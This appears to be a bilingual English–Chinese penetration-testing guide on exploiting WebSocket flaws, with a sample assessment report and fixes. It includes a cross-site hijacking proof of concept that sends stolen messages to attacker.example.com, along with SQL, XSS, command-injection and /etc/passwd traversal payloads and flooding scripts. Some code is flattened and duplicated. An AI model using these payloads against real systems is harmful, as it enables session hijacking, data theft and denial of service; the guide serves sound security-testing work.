Exploiting WebSocket Vulnerabilities

利用WebSocket漏洞

When to Use

适用场景

During authorized penetration tests when the application uses WebSocket connections for real-time features
When assessing chat applications, live notifications, trading platforms, or collaborative editing tools
For testing WebSocket API endpoints for authentication and authorization flaws
When evaluating real-time data streams for injection vulnerabilities
During security assessments of applications using Socket.IO, SignalR, or native WebSocket APIs

当应用使用WebSocket连接实现实时功能时，在授权渗透测试中使用
评估聊天应用、实时通知系统、交易平台或协同编辑工具时
测试WebSocket API端点的认证与授权缺陷
评估实时数据流是否存在注入漏洞时
对使用Socket.IO、SignalR或原生WebSocket API的应用进行安全评估时

Prerequisites

前置条件

Authorization: Written penetration testing agreement covering WebSocket testing
Burp Suite Professional: With WebSocket interception capability
Browser DevTools: Network tab for WebSocket frame inspection
websocat: Command-line WebSocket client (
```
cargo install websocat
```
)
wscat: Node.js WebSocket client (
```
npm install -g wscat
```
)
Python websockets: For scripting custom WebSocket attacks (
```
pip install websockets
```
)

授权：涵盖WebSocket测试的书面渗透测试协议
Burp Suite Professional：具备WebSocket拦截功能
浏览器开发者工具：通过Network面板检查WebSocket帧
websocat：命令行WebSocket客户端（
```
cargo install websocat
```
）
wscat：Node.js WebSocket客户端（
```
npm install -g wscat
```
）
Python websockets：用于编写自定义WebSocket攻击脚本（
```
pip install websockets
```
）

Workflow

测试流程

Step 1: Discover and Enumerate WebSocket Endpoints

步骤1：发现并枚举WebSocket端点

Identify WebSocket connections in the application.

bash

undefined

识别应用中的WebSocket连接。

bash

undefined

Check for WebSocket upgrade in response headers

检查响应头中的WebSocket升级信息

curl -s -I
-H "Upgrade: websocket"
-H "Connection: Upgrade"
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ=="
-H "Sec-WebSocket-Version: 13"
"https://target.example.com/ws"

Common WebSocket endpoint paths

常见WebSocket端点路径

for path in /ws /websocket /socket /socket.io /signalr /hub
/chat /notifications /live /stream /realtime /api/ws; do echo -n "$path: " status=$(curl -s -o /dev/null -w "%{http_code}"
-H "Upgrade: websocket"
-H "Connection: Upgrade"
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ=="
-H "Sec-WebSocket-Version: 13"
"https://target.example.com$path") echo "$status" done

Check for Socket.IO

检查是否使用Socket.IO

curl -s "https://target.example.com/socket.io/?EIO=4&transport=polling"

Check for SignalR

检查是否使用SignalR

curl -s "https://target.example.com/signalr/negotiate"

In browser DevTools:

在浏览器开发者工具中：

Network tab > Filter: WS

Network面板 > 筛选：WS

Look for ws:// or wss:// connections

查找ws://或wss://连接

Examine the upgrade request and WebSocket frames

检查升级请求和WebSocket帧

undefined

undefined

Step 2: Test WebSocket Authentication

步骤2：测试WebSocket认证机制

Verify that WebSocket connections require proper authentication.

bash

undefined

验证WebSocket连接是否需要正确的认证。

bash

undefined

Test connection without authentication

测试无认证连接

wscat -c "wss://target.example.com/ws"

If connection succeeds without tokens, auth is missing

如果无需令牌即可成功连接，说明缺少认证机制

Test with expired/invalid token

使用过期/无效令牌测试连接

wscat -c "wss://target.example.com/ws"
-H "Cookie: session=invalid_or_expired_token"

Test connection with stolen/replayed session

使用窃取/重放的会话测试连接

wscat -c "wss://target.example.com/ws"
-H "Cookie: session=valid_session_from_another_user"

Test token in WebSocket URL parameter

测试令牌作为WebSocket URL参数的情况

wscat -c "wss://target.example.com/ws?token=invalid_token"

Test if authentication is only checked at connection time

测试认证是否仅在连接时检查

Connect with valid token, then check if messages still work

使用有效令牌连接，然后在令牌过期或用户登出后，检查消息是否仍能正常发送

after the token expires or the user logs out

使用Python进行自动化测试

Using Python for automated testing

—

python3 << 'PYEOF' import asyncio import websockets

async def test_no_auth(): try: async with websockets.connect("wss://target.example.com/ws") as ws: print("Connected WITHOUT authentication!") # Try sending a message await ws.send('{"type":"get_data","resource":"users"}') response = await ws.recv() print(f"Response: {response}") except Exception as e: print(f"Connection failed: {e}")

asyncio.run(test_no_auth()) PYEOF

undefined

python3 << 'PYEOF' import asyncio import websockets

async def test_no_auth(): try: async with websockets.connect("wss://target.example.com/ws") as ws: print("Connected WITHOUT authentication!") # 尝试发送消息 await ws.send('{"type":"get_data","resource":"users"}') response = await ws.recv() print(f"Response: {response}") except Exception as e: print(f"Connection failed: {e}")

asyncio.run(test_no_auth()) PYEOF

undefined

Step 3: Test Cross-Site WebSocket Hijacking (CSWSH)

步骤3：测试跨站WebSocket劫持（CSWSH）

Check if the WebSocket handshake is vulnerable to cross-site attacks.

bash

undefined

检查WebSocket握手是否易受跨站攻击。

bash

undefined

Check Origin header validation on WebSocket upgrade

检查WebSocket升级请求中的Origin头验证

curl -s -I
-H "Upgrade: websocket"
-H "Connection: Upgrade"
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ=="
-H "Sec-WebSocket-Version: 13"
-H "Origin: https://evil.example.com"
"https://target.example.com/ws"

If 101 Switching Protocols: Origin not validated (vulnerable to CSWSH)

如果返回101 Switching Protocols：说明未验证Origin（易受CSWSH攻击）

If 403: Origin validation is working

如果返回403：说明Origin验证机制正常


```html
<!-- Cross-Site WebSocket Hijacking PoC -->
<!-- Host on attacker-controlled server -->
<html>
<head><title>CSWSH PoC</title></head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="messages"></div>
<script>
// This connects to the target's WebSocket using the victim's cookies
var ws = new WebSocket("wss://target.example.com/ws");

ws.onopen = function() {
  console.log("WebSocket connected (using victim's session)");
  // Request sensitive data through the WebSocket
  ws.send(JSON.stringify({type: "get_messages", channel: "private"}));
  ws.send(JSON.stringify({type: "get_profile"}));
};

ws.onmessage = function(event) {
  console.log("Data stolen: " + event.data);
  document.getElementById("messages").innerText += event.data + "\n";

  // Exfiltrate to attacker server
  fetch("https://attacker.example.com/collect", {
    method: "POST",
    body: event.data
  });
};

ws.onerror = function(error) {
  console.log("WebSocket error: " + error);
};
</script>
</body>
</html>


```html
<!-- 跨站WebSocket劫持PoC -->
<!-- 部署在攻击者控制的服务器上 -->
<html>
<head><title>CSWSH PoC</title></head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="messages"></div>
<script>
// 利用受害者的Cookie连接到目标WebSocket
var ws = new WebSocket("wss://target.example.com/ws");

ws.onopen = function() {
  console.log("WebSocket connected (using victim's session)");
  // 通过WebSocket请求敏感数据
  ws.send(JSON.stringify({type: "get_messages", channel: "private"}));
  ws.send(JSON.stringify({type: "get_profile"}));
};

ws.onmessage = function(event) {
  console.log("Data stolen: " + event.data);
  document.getElementById("messages").innerText += event.data + "\n";

  // 将数据泄露到攻击者服务器
  fetch("https://attacker.example.com/collect", {
    method: "POST",
    body: event.data
  });
};

ws.onerror = function(error) {
  console.log("WebSocket error: " + error);
};
</script>
</body>
</html>

Step 4: Test WebSocket Message Injection

步骤4：测试WebSocket消息注入

Assess WebSocket messages for injection vulnerabilities.

bash

undefined

评估WebSocket消息是否存在注入漏洞。

bash

undefined

Using wscat for manual message injection testing

使用wscat进行手动消息注入测试

wscat -c "wss://target.example.com/ws"
-H "Cookie: session=valid_session_token"

Once connected, send test messages:

连接成功后，发送测试消息：

SQL injection in WebSocket message

WebSocket消息中的SQL注入

> {"action":"search","query":"' OR 1=1--"}

XSS payload in chat message

聊天消息中的XSS payload

> {"type":"message","content":"<script>alert(document.cookie)</script>"}

> {"type":"message","content":"<img src=x onerror=alert(1)>"}

Command injection

命令注入

> {"action":"ping","host":"127.0.0.1; whoami"}

Path traversal

路径遍历

> {"action":"read_file","path":"../../../etc/passwd"}

IDOR in WebSocket messages

WebSocket消息中的IDOR

> {"action":"get_messages","channel_id":1}

> {"action":"get_messages","channel_id":2} (another user's channel)

> {"action":"get_messages","channel_id":2} (其他用户的频道)

Automated injection testing with Python

使用Python进行自动化注入测试

python3 << 'PYEOF' import asyncio import websockets import json

PAYLOADS = [ {"action": "search", "query": "' OR 1=1--"}, {"action": "search", "query": "<script>alert(1)</script>"}, {"action": "search", "query": "{{77}}"}, {"action": "search", "query": "${77}"}, {"action": "read", "file": "../../../etc/passwd"}, {"action": "exec", "cmd": "; whoami"}, ]

async def test_injections(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=valid_token"} ) as ws: for payload in PAYLOADS: await ws.send(json.dumps(payload)) try: response = await asyncio.wait_for(ws.recv(), timeout=5) print(f"Payload: {json.dumps(payload)}") print(f"Response: {response}\n") except asyncio.TimeoutError: print(f"Timeout for: {json.dumps(payload)}\n")

asyncio.run(test_injections()) PYEOF

undefined

python3 << 'PYEOF' import asyncio import websockets import json

PAYLOADS = [ {"action": "search", "query": "' OR 1=1--"}, {"action": "search", "query": "<script>alert(1)</script>"}, {"action": "search", "query": "{{77}}"}, {"action": "search", "query": "${77}"}, {"action": "read", "file": "../../../etc/passwd"}, {"action": "exec", "cmd": "; whoami"}, ]

async def test_injections(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=valid_token"} ) as ws: for payload in PAYLOADS: await ws.send(json.dumps(payload)) try: response = await asyncio.wait_for(ws.recv(), timeout=5) print(f"Payload: {json.dumps(payload)}") print(f"Response: {response}\n") except asyncio.TimeoutError: print(f"Timeout for: {json.dumps(payload)}\n")

asyncio.run(test_injections()) PYEOF

undefined

Step 5: Test WebSocket Authorization and Rate Limiting

步骤5：测试WebSocket授权与速率限制

Check if message-level authorization and abuse controls are enforced.

bash

undefined

检查是否实施了消息级授权和滥用控制。

bash

undefined

Test accessing other users' data via WebSocket

测试通过WebSocket访问其他用户的数据

python3 << 'PYEOF' import asyncio import websockets import json

async def test_authz(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=user_a_session"} ) as ws: # Try accessing User B's private data messages = [ {"type": "subscribe", "channel": "user_b_private"}, {"type": "get_history", "user_id": "user_b_id"}, {"type": "admin_action", "action": "list_users"}, {"type": "send_message", "to": "admin", "as": "admin"}, ] for msg in messages: await ws.send(json.dumps(msg)) try: response = await asyncio.wait_for(ws.recv(), timeout=5) print(f"Sent: {json.dumps(msg)}") print(f"Received: {response}\n") except asyncio.TimeoutError: print(f"No response for: {json.dumps(msg)}\n")

asyncio.run(test_authz()) PYEOF

python3 << 'PYEOF' import asyncio import websockets import json

async def test_authz(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=user_a_session"} ) as ws: # 尝试访问用户B的私有数据 messages = [ {"type": "subscribe", "channel": "user_b_private"}, {"type": "get_history", "user_id": "user_b_id"}, {"type": "admin_action", "action": "list_users"}, {"type": "send_message", "to": "admin", "as": "admin"}, ] for msg in messages: await ws.send(json.dumps(msg)) try: response = await asyncio.wait_for(ws.recv(), timeout=5) print(f"Sent: {json.dumps(msg)}") print(f"Received: {response}\n") except asyncio.TimeoutError: print(f"No response for: {json.dumps(msg)}\n")

asyncio.run(test_authz()) PYEOF

Test rate limiting on WebSocket messages

测试WebSocket消息的速率限制

python3 << 'PYEOF' import asyncio import websockets import json import time

async def test_rate_limit(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=valid_token"} ) as ws: start = time.time() for i in range(1000): await ws.send(json.dumps({ "type": "message", "content": f"Flood message {i}" })) elapsed = time.time() - start print(f"Sent 1000 messages in {elapsed:.2f} seconds") print("If no rate limiting, DoS is possible")

asyncio.run(test_rate_limit()) PYEOF

undefined

python3 << 'PYEOF' import asyncio import websockets import json import time

async def test_rate_limit(): async with websockets.connect( "wss://target.example.com/ws", extra_headers={"Cookie": "session=valid_token"} ) as ws: start = time.time() for i in range(1000): await ws.send(json.dumps({ "type": "message", "content": f"Flood message {i}" })) elapsed = time.time() - start print(f"Sent 1000 messages in {elapsed:.2f} seconds") print("If no rate limiting, DoS is possible")

asyncio.run(test_rate_limit()) PYEOF

undefined

Step 6: Test WebSocket Encryption and Protocol Security

步骤6：测试WebSocket加密与协议安全

Verify transport security and protocol-level protections.

bash

undefined

验证传输安全和协议级保护机制。

bash

undefined

Check if WebSocket uses WSS (encrypted) or WS (plaintext)

检查WebSocket使用WSS（加密）还是WS（明文）

WS (ws://) traffic can be intercepted by network attackers

WS（ws://）流量可能被网络攻击者拦截

Check for mixed protocols

检查混合协议情况

Application on HTTPS but WebSocket on WS = insecure

应用使用HTTPS但WebSocket使用WS = 不安全

curl -s "https://target.example.com/" | grep -oP "ws://[^"']+"

Should only find wss:// (encrypted WebSocket)

应仅能找到wss://（加密WebSocket）

Test Sec-WebSocket-Protocol header handling

测试Sec-WebSocket-Protocol头处理

wscat -c "wss://target.example.com/ws"
-H "Sec-WebSocket-Protocol: admin-protocol"

Test for compression side-channel (CRIME-like attacks)

测试压缩侧信道（类CRIME攻击）

Check if Sec-WebSocket-Extensions includes permessage-deflate

检查Sec-WebSocket-Extensions是否包含permessage-deflate

curl -s -I
-H "Upgrade: websocket"
-H "Connection: Upgrade"
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ=="
-H "Sec-WebSocket-Version: 13"
-H "Sec-WebSocket-Extensions: permessage-deflate"
"https://target.example.com/ws" | grep -i "sec-websocket-extensions"

permessage-deflate with secrets in messages can leak data via compression

如果消息中包含敏感信息，permessage-deflate可能通过压缩泄露数据

Test WebSocket connection persistence

测试WebSocket连接持久性

Check if server implements proper timeouts and connection limits

检查服务器是否实施了适当的超时和连接限制

undefined

undefined

Key Concepts

核心概念

Concept	Description
WebSocket Handshake	HTTP upgrade request that transitions the connection from HTTP to WebSocket protocol
CSWSH	Cross-Site WebSocket Hijacking - exploiting missing Origin validation to hijack sessions
Origin Validation	Server-side check that the WebSocket upgrade request comes from a trusted origin
Message-level Authorization	Verifying permissions for each WebSocket message, not just at connection time
WSS	WebSocket Secure - encrypted WebSocket connection over TLS (equivalent to HTTPS)
Socket.IO	Popular WebSocket library with automatic fallback to HTTP long-polling
Ping/Pong Frames	WebSocket keepalive mechanism; can be abused for timing attacks

概念	说明
WebSocket Handshake	HTTP升级请求，将连接从HTTP协议转换为WebSocket协议
CSWSH	跨站WebSocket劫持 - 利用缺失的Origin验证劫持会话
Origin Validation	服务器端检查WebSocket升级请求是否来自可信源
Message-level Authorization	验证每个WebSocket消息的权限，而非仅在连接时检查
WSS	WebSocket Secure - 基于TLS的加密WebSocket连接（等同于HTTPS）
Socket.IO	流行的WebSocket库，可自动回退到HTTP长轮询
Ping/Pong Frames	WebSocket保活机制；可能被滥用于时序攻击

Tools & Systems

工具与系统

Tool	Purpose
Burp Suite Professional	WebSocket interception, modification, and history analysis
wscat	Command-line WebSocket client for manual testing
websocat	Versatile command-line WebSocket client written in Rust
Browser DevTools	Network tab WS filter for inspecting WebSocket frames
Socket.IO Client	Testing Socket.IO-based WebSocket implementations
Python websockets	Scripting automated WebSocket attack sequences

工具	用途
Burp Suite Professional	WebSocket拦截、修改和历史分析
wscat	用于手动测试的命令行WebSocket客户端
websocat	Rust编写的多功能命令行WebSocket客户端
Browser DevTools	利用Network面板的WS筛选器检查WebSocket帧
Socket.IO Client	测试基于Socket.IO的WebSocket实现
Python websockets	编写自动化WebSocket攻击脚本

Common Scenarios

常见场景

Scenario 1: Chat Application CSWSH

场景1：聊天应用CSWSH漏洞

A real-time chat application validates the user's cookie during the WebSocket handshake but does not check the Origin header. An attacker hosts a page that opens a WebSocket to the chat server, stealing the victim's private messages.

实时聊天应用在WebSocket握手时验证用户Cookie，但未检查Origin头。攻击者托管一个页面，打开到聊天服务器的WebSocket连接，窃取受害者的私人消息。

Scenario 2: Trading Platform Message Injection

场景2：交易平台消息注入漏洞

A trading platform processes WebSocket messages containing order parameters. SQL injection in the

symbol

field of an order message allows extracting the entire order database through error-based SQLi.

交易平台处理包含订单参数的WebSocket消息。订单消息的

symbol

字段存在SQL注入漏洞，允许通过基于错误的SQLi提取整个订单数据库。

Scenario 3: Missing Message Authorization

场景3：缺失消息级授权

A collaboration tool checks user authentication at WebSocket connection time but does not verify authorization for individual messages. After connecting, a regular user sends admin-level commands to delete workspaces and export user data.

协作工具在WebSocket连接时检查用户认证，但未验证单个消息的授权。普通用户连接后，发送管理员级命令以删除工作区并导出用户数据。

Scenario 4: Notification Channel IDOR

场景4：通知频道IDOR漏洞

A notification system subscribes users to channels via WebSocket messages containing channel IDs. Changing the channel ID allows any user to subscribe to any other user's private notification channel.

通知系统通过包含频道ID的WebSocket消息让用户订阅频道。修改频道ID可让任意用户订阅其他用户的私人通知频道。

Output Format

输出格式

undefined

undefined

WebSocket Security Assessment Report

WebSocket安全评估报告

Vulnerability: Cross-Site WebSocket Hijacking (CSWSH) Severity: High (CVSS 8.1) Location: wss://target.example.com/ws OWASP Category: A01:2021 - Broken Access Control

漏洞类型：跨站WebSocket劫持（CSWSH） 严重程度：高（CVSS 8.1）位置：wss://target.example.com/ws OWASP分类：A01:2021 - 访问控制失效

WebSocket Configuration

WebSocket配置

Property	Value
Protocol	WSS (encrypted)
Library	Socket.IO 4.x
Authentication	Cookie-based session
Origin Validation	NOT ENFORCED
Message Authorization	NOT ENFORCED
Rate Limiting	NOT IMPLEMENTED

属性	取值
协议	WSS（加密）
库	Socket.IO 4.x
认证方式	Cookie会话
Origin验证	未实施
消息级授权	未实施
速率限制	未实现

Findings

发现的漏洞

Finding	Severity
CSWSH - No Origin validation	High
Missing message-level authorization	High
XSS via chat message injection	Medium
No rate limiting on messages	Medium
Channel IDOR (subscribe to any channel)	High
WebSocket open after logout	Medium

漏洞	严重程度
CSWSH - 无Origin验证	高
缺失消息级授权	高
聊天消息注入导致XSS	中
消息无速率限制	中
频道IDOR（可订阅任意频道）	高
登出后WebSocket仍保持连接	中

Impact

影响

Private message exfiltration via CSWSH
Account impersonation through unauthorized message sending
Cross-channel data access affecting all users
DoS via message flooding (no rate limits)

通过CSWSH泄露私人消息
通过未授权消息发送实现账号冒充
跨频道数据访问影响所有用户
消息泛洪导致DoS攻击（无速率限制）

Recommendation

修复建议

Validate the Origin header during WebSocket handshake
Implement CSRF tokens in the WebSocket upgrade request
Enforce authorization checks on every WebSocket message
Sanitize all user input in WebSocket messages (prevent XSS/SQLi)
Implement message rate limiting per connection
Invalidate WebSocket connections on logout or session expiration
Use per-message authentication tokens rather than relying solely on the initial handshake

undefined

在WebSocket握手时验证Origin头
在WebSocket升级请求中实现CSRF令牌
对每个WebSocket消息实施授权检查
对WebSocket消息中的所有用户输入进行 sanitize（防止XSS/SQLi）
为每个连接实施消息速率限制
在登出或会话过期时使WebSocket连接失效
使用每条消息的认证令牌，而非仅依赖初始握手

undefined

exploiting-websocket-vulnerabilities

Original

Translation

Exploiting WebSocket Vulnerabilities

利用WebSocket漏洞

When to Use

适用场景

Prerequisites

前置条件

Workflow

测试流程

Step 1: Discover and Enumerate WebSocket Endpoints

步骤1：发现并枚举WebSocket端点

Check for WebSocket upgrade in response headers

检查响应头中的WebSocket升级信息

Common WebSocket endpoint paths

常见WebSocket端点路径

Check for Socket.IO

检查是否使用Socket.IO

Check for SignalR

检查是否使用SignalR

In browser DevTools:

在浏览器开发者工具中：

Network tab > Filter: WS

Network面板 > 筛选：WS

Look for ws:// or wss:// connections

查找ws://或wss://连接

Examine the upgrade request and WebSocket frames

检查升级请求和WebSocket帧

Step 2: Test WebSocket Authentication

步骤2：测试WebSocket认证机制

Test connection without authentication

测试无认证连接

If connection succeeds without tokens, auth is missing

如果无需令牌即可成功连接，说明缺少认证机制

Test with expired/invalid token

使用过期/无效令牌测试连接

Test connection with stolen/replayed session

使用窃取/重放的会话测试连接

Test token in WebSocket URL parameter

测试令牌作为WebSocket URL参数的情况

Test if authentication is only checked at connection time

测试认证是否仅在连接时检查

Connect with valid token, then check if messages still work

使用有效令牌连接，然后在令牌过期或用户登出后，检查消息是否仍能正常发送

after the token expires or the user logs out

使用Python进行自动化测试

Using Python for automated testing

Step 3: Test Cross-Site WebSocket Hijacking (CSWSH)

步骤3：测试跨站WebSocket劫持（CSWSH）

Check Origin header validation on WebSocket upgrade

检查WebSocket升级请求中的Origin头验证

If 101 Switching Protocols: Origin not validated (vulnerable to CSWSH)

如果返回101 Switching Protocols：说明未验证Origin（易受CSWSH攻击）

If 403: Origin validation is working

如果返回403：说明Origin验证机制正常

Step 4: Test WebSocket Message Injection

步骤4：测试WebSocket消息注入

Using wscat for manual message injection testing

使用wscat进行手动消息注入测试

Once connected, send test messages:

连接成功后，发送测试消息：

SQL injection in WebSocket message

WebSocket消息中的SQL注入

> {"action":"search","query":"' OR 1=1--"}

> {"action":"search","query":"' OR 1=1--"}

XSS payload in chat message

聊天消息中的XSS payload

> {"type":"message","content":"<script>alert(document.cookie)</script>"}

> {"type":"message","content":"<script>alert(document.cookie)</script>"}

> {"type":"message","content":"<img src=x onerror=alert(1)>"}

> {"type":"message","content":"<img src=x onerror=alert(1)>"}

Command injection

命令注入

> {"action":"ping","host":"127.0.0.1; whoami"}

> {"action":"ping","host":"127.0.0.1; whoami"}

Path traversal

路径遍历

> {"action":"read_file","path":"../../../etc/passwd"}

> {"action":"read_file","path":"../../../etc/passwd"}